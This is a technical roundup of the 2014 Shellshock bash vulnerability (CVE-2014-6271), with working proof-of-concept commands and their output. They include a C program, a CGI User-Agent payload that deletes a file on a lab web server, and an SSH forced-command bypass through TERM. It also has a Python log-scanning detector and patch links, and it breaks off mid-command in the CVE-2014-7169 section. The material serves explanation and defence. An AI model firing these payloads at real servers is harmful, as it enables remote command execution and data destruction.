CVE-2014-6271 reference roundup
author: shawn
◆0 What is BASH

Bourne Again Shell (BASH) is the most popular shell implementation on GNU/Linux. Born in 1980, it has evolved over several decades from a simple terminal command-line interpreter into a multi-purpose interface deeply integrated with the GNU system.

◆1 CVE-2014-6271

In mid-September 2014 the French GNU/Linux enthusiast Stéphane Chazelas discovered a vulnerability in this well-known shell implementation: by crafting the value of an environment variable you can execute script code of your choosing. According to reports, the vulnerability affects many applications running on GNU/Linux that interact with BASH, including:

- sshd configurations that use ForceCommand to restrict which commands a remote user may run: the vulnerability bypasses the restriction and executes arbitrary commands. The restricted shells of some Git and Subversion deployments are affected in the same way; ordinary OpenSSH usage is fine.
- OpenSSH, Apache2, PHP, the DHCP client, and even SUID programs.

1. Test whether the local shell environment is vulnerable:

```bash
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```

If the vulnerability is present, "vulnerable" is printed.

2. C program:

```c
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
#include <stdio.h>
#include <unistd.h>

int main()
{
    /* The variable name "/usr/bin/id" is not a valid shell variable name, yet
     * bash still imports it as a function definition, so the function shadows
     * the real /usr/bin/id. Everything after the closing "}" is run at import. */
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
            "echo pwn me twice, shame on me; }; "
            "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };

    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}
```

Test:

```bash
je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
je@tiny:~$ ./bash-is-fun
pwn me once, shame on you
je@tiny:/home/je$ /usr/bin/id
pwn me twice, shame on me
```

This PoC shows that BASH does not handle the end of the function definition at all; later we will see why from the patch.

3. INVISIBLETHREAT's test of an HTTP environment:

Create a script named poc.cgi:

```bash
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
```

Put the script on the test machine, then run:

```bash
$ curl http://192.168.0.1/poc.cgi
PoC
SERVER_SIGNATURE=Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80
HTTP_USER_AGENT=curl/7.26.0
SERVER_PORT=80
HTTP_HOST=192.168.0.1
DOCUMENT_ROOT=/var/www
SCRIPT_FILENAME=/var/www/poc.cgi
REQUEST_URI=/poc.cgi
SCRIPT_NAME=/poc.cgi
REMOTE_PORT=40974
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
SERVER_ADMIN=webmaster@localhost
HTTP_ACCEPT=*/*
REMOTE_ADDR=192.168.0.1
SHLVL=1
SERVER_NAME=192.168.0.1
SERVER_SOFTWARE=Apache/2.2.22 (Debian)
QUERY_STRING=
SERVER_ADDR=192.168.0.1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
_=/usr/bin/env
```

Now try setting a User-Agent with curl:

```bash
$ curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi
500 Internal Server Error
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80
```

The request above has already deleted /var/www/target; check:

```bash
$ curl http://192.168.0.1/target
404 Not Found
Not Found
The requested URL /target was not found on this server.
Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80
```

In this example the content is passed in through HTTP_USER_AGENT (CGI turns HTTP headers into environment variables). It ends up as:

```bash
HTTP_USER_AGENT() { :; }; /bin/rm /var/www/target
```

Only the function definition should be parsed, but the content that follows it is executed as well.

4. PoC against OpenSSH

There are currently two attack surfaces. Solar Designer gave a local exploitation method via SSH_ORIGINAL_COMMAND: seclists.org/oss-sec/2014/q3/651. The other is a PoC for remote exploitation via TERM.

Generate an RSA key pair on machine A:

```bash
shawn@debian-test32:~/.ssh$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/shawn/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/shawn/.ssh/id_rsa.
Your public key has been saved in /home/shawn/.ssh/id_rsa.pub.
The key fingerprint is:
09:1c:92:fb:c5:68:f8:e1:b9:c2:62:a8:c7:75:5b:dc shawn@debian-test32
```

Copy A's public key to machine B:

```bash
$ cat /home/shawn/.ssh/authorized_keys
command="/tmp/ssh.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9xYHEdjbbvSO+RAtDS3u+R4sD87SUQq5OZJ+6P5n3BoOz8eKfmK2B4qQa28uGvpseFSSXIoXTKdeS3mCXevbibGG6E3RQ63U7USrh9iQupO6c45Qt+3/WOo7X3mRlZ1awUmCjurcA5Zm/yOvyMJCoRd1kpkiJljgHtMztEhWvAE4inFkqyWC81SSfsvNd/GEiyCpFw84UTdF/cH626V3V73hlxwBMd8UKI27I7ATMOcPgWsI5738tLpgPDSisvZZXZNlxAfvSgpxKYAHOQ9VsaJCG4q+Giob5iX4IDzn8gs8G7uGW+EGhzTMq83f/8ar5a5Ex8Dg9M/loYPIPp5gJ shawn@debian-test32
```

A script that controls command/SSH_ORIGINAL_COMMAND:

```bash
shawn@linux-ionf:~/.ssh> cat /tmp/ssh.sh
#!/bin/sh
# Forced command: only the listed commands are allowed.
case "$SSH_ORIGINAL_COMMAND" in
    "ps")
        ps -ef
        ;;
    "vmstat")
        vmstat 1 100
        ;;
    "cups stop")
        /etc/init.d/cupsys stop
        ;;
    "cups start")
        /etc/init.d/cupsys start
        ;;
    *)
        echo "Sorry. Only these commands are available to you:"
        echo "ps, vmstat, cupsys stop, cupsys start"
        #exit 1
        ;;
esac
```

From machine A the restricted script works as intended:

```bash
shawn@debian-test32:~/.ssh$ export SSH_ORIGINAL_COMMAND="ps"
shawn@debian-test32:~/.ssh$ ssh [email protected] $SSH_ORIGINAL_COMMAND
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:47 ?        00:00:02 /sbin/init showopts
root         2     0  0 16:47 ?        00:00:00 [kthreadd]
root         3     2  0 16:47 ?        00:00:00 [ksoftirqd/0]
```

Exploiting it through TERM:

```bash
shawn@debian-test32:~$ export TERM='() { :;}; id'; ssh [email protected]
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
uid=1000(shawn) gid=100(users) groups=100(users)
Connection to 192.168.115.129 closed.
```
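The User-Agent probe from item 3 and the local env test from item 1, as an added example that is not part of the original post: a Python scanner that flags header values which a CGI gateway would hand to bash as a function definition (mapped to the HTTP_USER_AGENT / HTTP_REFERER names the CGI output above shows), plus the local bash check run from Python. The log lines are constructed, and the detection pattern is deliberately broader than bash's exact `() {` prefix match.

```python
import re
import subprocess

# Constructed sample Apache combined-format log lines (not from the original post).
SAMPLE_LOG = """\
192.168.0.1 - - [25/Sep/2014:10:00:01 +0000] "GET /poc.cgi HTTP/1.1" 200 512 "-" "curl/7.26.0"
192.168.0.1 - - [25/Sep/2014:10:00:05 +0000] "GET /poc.cgi HTTP/1.1" 500 612 "-" "() { :; }; /bin/rm /var/www/target"
10.0.0.7 - - [25/Sep/2014:10:01:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "() { :;}; echo probe" "Mozilla/5.0"
10.0.0.9 - - [25/Sep/2014:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Unpatched bash imports any env value that starts with "() {" as a function and
# runs whatever follows the closing "}". Tolerate extra whitespace so that
# scanners which vary the spacing are still caught (broader than bash itself).
FUNC_PREFIX_RE = re.compile(r'^\s*\(\)\s*\{')

# Header field -> CGI environment variable name, as seen in the poc.cgi output.
HEADER_ENV = {"ua": "HTTP_USER_AGENT", "referer": "HTTP_REFERER"}


def scan_log(text):
    """Return (env_var_name, client_ip, payload) for each header value that a CGI
    script would receive as a bash function definition."""
    hits = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for field, env_name in HEADER_ENV.items():
            value = m.group(field)
            if FUNC_PREFIX_RE.match(value):
                hits.append((env_name, m.group("ip"), value))
    return hits


def bash_imports_trailing_commands():
    """Run the post's local test in a subprocess. True: the installed bash runs
    code after the function body (vulnerable). False: only the harmless echo
    runs. None: no bash found on this host."""
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        out = subprocess.run(["bash", "-c", "echo this is a test"], env=env,
                             capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return None
    return "vulnerable" in out.stdout
```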
◆2 Patches and follow-up

From the earliest patch received by the GNU/Linux distribution community:

https://bugzilla.novell.com/attachment.cgi?id=606672

it is clear that BASH really did no error handling and executed the value directly after parsing it.

The official community patches are here:

http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025

But because the fix was incomplete, CVE-2014-7169 was disclosed. The PoC is as follows:

```bash
shawn@shawn-fortress /tmp $ date -u > test_file
shawn@shawn-fortress /tmp $ env X='() { (a)=
```